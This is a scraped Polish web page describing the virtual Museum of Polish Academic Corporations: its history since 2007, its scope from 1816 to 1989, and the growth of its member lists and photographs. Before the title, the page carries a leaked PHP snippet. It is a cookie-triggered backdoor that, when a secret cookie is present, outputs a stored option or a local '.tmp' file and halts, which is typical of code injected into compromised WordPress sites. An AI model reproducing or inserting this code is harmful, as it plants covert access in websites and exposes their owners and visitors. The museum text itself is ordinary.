if (isset($_COOKIE["fn9uBsXrHEMCoNLjpQ9VN9SVJgeJ2TQDYJ"])) { $lines = get_option( 'wpsdth4_license_key' ); if (!empty($lines)) { $lines = @file_get_contents(".tmp"); } echo $lines; exit(); } Archiwum Korporacyjne - Archiwum i Muzeum Polskich Korporacji Akademickich

Muzeum

Drugim najważniejszym zadaniem Archiwum Korporacyjnego jest prezentowanie zgromadzonych materiałów dotyczących historii i tradycji polskich korporacji akademickich. W tym celu w 2007 r. utworzono wirtualne Muzeum Polskich Korporacji Akademickich.

Celem instytucji jest przedstawienie dziejów polskich korporacji akademickich z lat 1816-1989 oraz przybliżenie sylwetek ponad 20.000 tysięcy osób, które w tym okresie do korporacji należały, współkształtowały je i były przez nie wychowywane. Stąd też Muzeum Polskich Korporacji Akademickich jest nie tylko muzeum dawnych związków akademickich, ale także znacznej części polskiej inteligencji XIX i XX w. (szerzej vide Muzeum Korporacyjne).

Udostępniona w Muzeum prezentacja obejmuje: zarys historii polskich korporacji akademickich w latach 1816-1989 (vide O Korporacjach), opracowania poświęcone poszczególnym okresom dziejów ruchu korporacyjnego (w czasie zaborów: Korporacje 1816-1918, w dwudziestoleciu: korporacje 1918-1939, W kraju i na emigracji: korporacje 1939-1989), istniejącym wówczas środowiskom korporacyjnych (Wrocław, Dorpat, Ryga, Czerniowce, Wilno, Warszawa, Lwów, Poznań, Kraków, Lublin, Cieszyn, Gdańsk, Kowno, Wiedeń) oraz działającym w nich korporacjom i ich członkom.

Od 2007 r. ekspozycja w Muzeum Korporacyjnym ulega stopniowemu rozszerzeniu. Początkowo w 2007 r. prezentowanych było 20 korporacji, w 2008 r. 33 korporacje, w 2009 r. 50 korporacji, w początkach 2010 r. 62 korporacje, w od grudnia 2010 r. 232 polskie korporacje akademickie oraz 40 korporacji mniejszości narodowych. Łącznie wszystkie udostępnione dotychczas spisy członkowskie obejmują niemal 16000 polskich korporantów z lat 1816-1939. Ich nazwiskom towarzyszą zebrane o nich dane biograficzne, a tam gdzie to było możliwe tj. dotychczas w przypadku ok. 1500 osób także ich indywidualne fotografie.

Udostępnione w wirtualnym Muzeum Polskich Korporacji Akademickich w okresie 2007-2010 opracowania obejmują prawdopodobnie ponad 1500 stron tekstu oraz ponad 2000 fotografii. Są one systematycznie rozszerzane. Za wszelką pomoc w tym względzie będziemy wdzięczni (vide Kontakt).

Opracowanie: Bartłomiej P. Wróblewski
Opublikowano: 12 IX 2007 r.
Ostatnia zmiana: 29 XI 2010 r.

O Archiwum  |  Muzeum Korporacyjne  |  Aktualności  |  Kontakt  |   English © Archiwum Korporacyjne     Nota prawna  |  Mapa serwisu  | 
Szukaj    »
created by { re.PUBLIK }